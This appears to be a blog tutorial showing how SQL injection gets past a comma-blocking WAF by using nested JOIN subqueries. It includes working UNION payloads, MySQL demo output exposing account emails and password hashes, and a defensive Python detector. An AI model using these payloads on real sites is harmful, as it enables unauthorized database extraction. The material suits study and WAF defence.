In SQL injection, once the injection point has been confirmed, you normally use a UNION query to guess the number of columns: the familiar ORDER BY n, decreasing n until the page returns normally, which gives the column count of the current query.
Then UNION SELECT 1,2,3,4,5,6,7..n is used to find which positions are displayed, followed by UNION SELECT 1,2,3,4,database(),6,7..n. This is the standard procedure, and the statements contain multiple commas.
But if a WAF blocks the comma, our UNION query is blocked.
To get around that, the JOIN method is used. See my other article for an introduction to JOIN.
It really comes down to a few statements; on the displayed positions you substitute the usual injection variables or other expressions:
union select 1,2,3,4;
union select * from ((select 1)A join (select 2)B join (select 3)C join (select 4)D);
union select * from ((select 1)A join (select 2)B join (select 3)C join (select group_concat(user(),' ',database(),' ',@@datadir))D);
Commonly used database variables:
user() -- current user
database() -- current database name
version() -- database version
@@datadir -- database data directory
@@version_compile_os -- operating system version
system_user() -- system user name
current_user() -- current user name (the account the session was authenticated as)
session_user() -- user name used to connect to the database
Example:
1. Suppose I have a table user with 5 columns (fields) and 2 rows:
mysql> show tables;
+----------------+
| Tables_in_gogs |
+----------------+
| user           |
| version        |
+----------------+
2 rows in set (0.00 sec)

mysql> desc user;
+--------+--------------+------+-----+---------+----------------+
| Field  | Type         | Null | Key | Default | Extra          |
+--------+--------------+------+-----+---------+----------------+
| id     | bigint(20)   | NO   | PRI | NULL    | auto_increment |
| name   | varchar(255) | NO   | UNI | NULL    |                |
| email  | varchar(255) | NO   |     | NULL    |                |
| passwd | varchar(255) | NO   |     | NULL    |                |
| salt   | varchar(10)  | NO   |     | NULL    |                |
+--------+--------------+------+-----+---------+----------------+
5 rows in set (0.01 sec)

mysql> select id,name,email,passwd from user;
+----+-----------+------------------+------------------------------------------------------------------------------------------------------+
| id | name | email | passwd |
+----+-----------+------------------+------------------------------------------------------------------------------------------------------+
| 1 | zhangsan | 11111@qq.com | eeb8ecb282bcc107c36d9d46826db5b86b9a9f2d2c2c3df237184d47fa97cee74ebea158bc4b5e27ad4a5f8e0ea925bbcf5e |
| 2 | ihoney | 102505481@qq.com | a0d63e18d85bc5be5d2d133d1c01d33b2c6653e037afd018a1078e4703ac278c51801d47fcaaee7a6ad8a26d6a3373b7d0af |
+----+-----------+------------------+------------------------------------------------------------------------------------------------------+
2 rows in set (0.00 sec)
2. The part starting with UNION is the statement we inject via the URL; this is only a demonstration. In practice, if our injected statement contains commas it may be blocked.
mysql> select id,name,email,passwd from user union select 1,2,3,4;
+----+-----------+------------------+------------------------------------------------------------------------------------------------------+
| id | name | email | passwd |
+----+-----------+------------------+------------------------------------------------------------------------------------------------------+
| 1 | zhangsan | 11111@qq.com | eeb8ecb282bcc107c36d9d46826db5b86b9a9f2d2c2c3df237184d47fa97cee74ebea158bc4b5e27ad4a5f8e0ea925bbcf5e |
| 2 | ihoney | 102505481@qq.com | a0d63e18d85bc5be5d2d133d1c01d33b2c6653e037afd018a1078e4703ac278c51801d47fcaaee7a6ad8a26d6a3373b7d0af |
| 1 | 2 | 3 | 4 |
+----+-----------+------------------+------------------------------------------------------------------------------------------------------+
3 rows in set (0.00 sec)
3. Without using any comma, continue the injection with JOIN:
mysql> select id,name,email,passwd from user union select * from ((select 1)A join (select 2)B join (select 3)C join (select 4)D);
+----+-----------+------------------+------------------------------------------------------------------------------------------------------+
| id | name | email | passwd |
+----+-----------+------------------+------------------------------------------------------------------------------------------------------+
| 1 | zhangsan | 11111@qq.com | eeb8ecb282bcc107c36d9d46826db5b86b9a9f2d2c2c3df237184d47fa97cee74ebea158bc4b5e27ad4a5f8e0ea925bbcf5e |
| 2 | ihoney | 102505481@qq.com | a0d63e18d85bc5be5d2d133d1c01d33b2c6653e037afd018a1078e4703ac278c51801d47fcaaee7a6ad8a26d6a3373b7d0af |
| 1 | 2 | 3 | 4 |
+----+-----------+------------------+------------------------------------------------------------------------------------------------------+
3 rows in set (0.00 sec)
4. After the bypass, replace the displayed numeric positions to continue the injection and obtain database and system information:
mysql> select id,name,email,passwd from user union select * from ((select 1)A join (select 2)B join (select 3)C join (select group_concat(user(),' ',database(),' ',@@datadir))D);
+----+-----------+------------------+------------------------------------------------------------------------------------------------------+
| id | name | email | passwd |
+----+-----------+------------------+------------------------------------------------------------------------------------------------------+
| 1 | zhangsan | 11111@qq.com | eeb8ecb282bcc107c36d9d46826db5b86b9a9f2d2c2c3df237184d47fa97cee74ebea158bc4b5e27ad4a5f8e0ea925bbcf5e |
| 2 | ihoney | 102505481@qq.com | a0d63e18d85bc5be5d2d133d1c01d33b2c6653e037afd018a1078e4703ac278c51801d47fcaaee7a6ad8a26d6a3373b7d0af |
| 1 | 2 | 3 | root@localhost gogs /var/lib/mysql/ |
+----+-----------+------------------+------------------------------------------------------------------------------------------------------+
3 rows in set (0.00 sec)
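On the defensive side, a WAF rule that only blocks commas misses the JOIN form shown above. The following Python detector is an added example, not code from the original post: it normalizes a request parameter (URL-decoding, lowercasing, stripping comments) and flags both the classic comma-separated UNION SELECT and the comma-free nested-JOIN variant, plus the metadata functions listed earlier. The sample parameters are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request parameters (not taken from the original post).
SAMPLES = {
    "benign":      "id=42",
    "benign_word": "q=join+the+union+today",
    "classic":     "id=1+union+select+1,2,3,4",
    "join_bypass": "id=1+union+select+*+from+((select+1)A+join+(select+2)B+join+(select+3)C+join+(select+4)D)",
    "join_info":   "id=1%20union%20select%20*%20from%20((select%201)A%20join%20(select%20group_concat(user(),database(),@@datadir))D)",
}

def normalize(value: str) -> str:
    """URL-decode twice (catches double encoding), lowercase, strip /* */ comments, collapse whitespace."""
    s = unquote_plus(unquote_plus(value)).lower()
    s = re.sub(r"/\*.*?\*/", " ", s)
    return re.sub(r"\s+", " ", s).strip()

UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b")
# Classic column list: "union select 1,2,3,..."
COMMA_LIST = re.compile(r"\bunion\s+(?:all\s+)?select\s+[^,]*,")
# Comma-free column building: derived tables joined together, e.g. "(select 1)a join (select 2)b"
JOIN_CHAIN = re.compile(r"\(\s*select\b[^()]*\)\s*\w*\s*join\s*\(\s*select\b")
# Server-metadata functions and system variables from the list above
INFO_FUNCS = re.compile(
    r"\b(?:database|user|version|system_user|current_user|session_user)\s*\(\s*\)|@@\w+"
)

def classify(raw: str) -> list[str]:
    """Return the list of findings for one request parameter (empty list = nothing suspicious)."""
    s = normalize(raw)
    findings = []
    if UNION_SELECT.search(s):
        findings.append("union_select")
        if JOIN_CHAIN.search(s):
            findings.append("comma_less_join")   # the bypass this post describes
        elif COMMA_LIST.search(s):
            findings.append("comma_list")        # the form a comma filter already catches
    if INFO_FUNCS.search(s):
        findings.append("db_info_function")
    return findings

if __name__ == "__main__":
    for name, param in SAMPLES.items():
        print(f"{name:12s} -> {classify(param)}")
```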
